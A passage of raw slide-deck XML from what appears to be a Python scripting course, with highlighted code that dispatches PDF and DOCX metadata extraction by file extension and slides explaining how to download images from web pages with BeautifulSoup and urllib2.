              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.file_path</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_extension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>splitext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_extension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>".pdf"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>get_pdf_metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_extension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>".docx"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>get_docx_metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="ABB2B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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"Unsupported file format"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">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3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a:t>Downloading Images with BeautifulSoup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1046" name="Google Shape;1046;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2144475"/>
            <a:ext cx="9772800" cy="4531200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="328930" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The web-based application named Beautiful Soup is used to parse HTML and XML documents. It was developed by Leonard Richardson. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="328930" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>To install Beautiful Soup, the user can use the command line terminal and type "easy_install beautifulsoup4" Beautiful Soup is used to scrape the contents of an HTML or XML document, specifically it can be used to extract images found in the document. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="328930" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The urllib2 library is used to open the document and read its contents. A Beautiful Soup object is created, which contains different objects of the HTML or XML document. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p38"/>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3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a:t>Downloading Images with BeautifulSoup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Google Shape;1053;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2144475"/>
            <a:ext cx="9772800" cy="4531200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="328930" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The particular object is used to extract all the image tags by using a searching method called .findall('img’). </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="328930" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This method returns all image tags as an array data type. Next, we need to extract the image tags in order to examine them. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-328930" lvl="0" marL="328930" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The binary contents of the image are read into a variable, and finally, a file is opened in 'wb' mode and the contents of the image are written to the file.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1054" name="Google Shape;1054;p39"/>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5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91525"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3933"/>
              <a:t>Downloading Images with BeautifulSoup</a:t>
            </a:r>
            <a:endParaRPr sz="3933"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50851"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3933"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
